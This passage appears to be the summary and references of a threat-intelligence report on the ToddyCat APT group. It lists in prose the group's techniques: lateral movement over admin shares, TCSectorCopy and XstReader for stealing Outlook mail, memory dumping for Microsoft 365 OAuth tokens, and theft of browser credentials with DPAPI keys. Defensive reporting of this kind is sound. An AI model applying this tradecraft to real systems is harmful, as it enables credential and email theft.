  • Lateral movement relies on the C$ administrative share of remote hosts, through which the attackers both copy in SSH clients and keys and read credential stores out of user profiles.
  • Specialized tools such as TCSectorCopy are utilized to bypass file locks on Outlook OST files, enabling the theft of email data, which is then extracted using XstReader.
  • The group steals credentials by dumping the memory of Microsoft 365 processes for OAuth tokens and copying saved browser logins together with DPAPI master keys, then compresses everything with WinRAR or 7-Zip for exfiltration.

References

[1] G. Dedola, “APT ToddyCat,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat/106799/

[2] A. Gunkin, “How ToddyCat tried to hide behind AV software,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat-apt-exploits-vulnerability-in-eset-software-for-dll-proxying/116086/

[3] A. Gunkin, “ToddyCat: your hidden email assistant. Part 1,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat-apt-steals-email-data-from-outlook/118044/

[4] A. Gunkin, “ToddyCat is making holes in your infrastructure,” Kaspersky. Accessed: Dec. 11, 2025. [Online]. Available: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/

 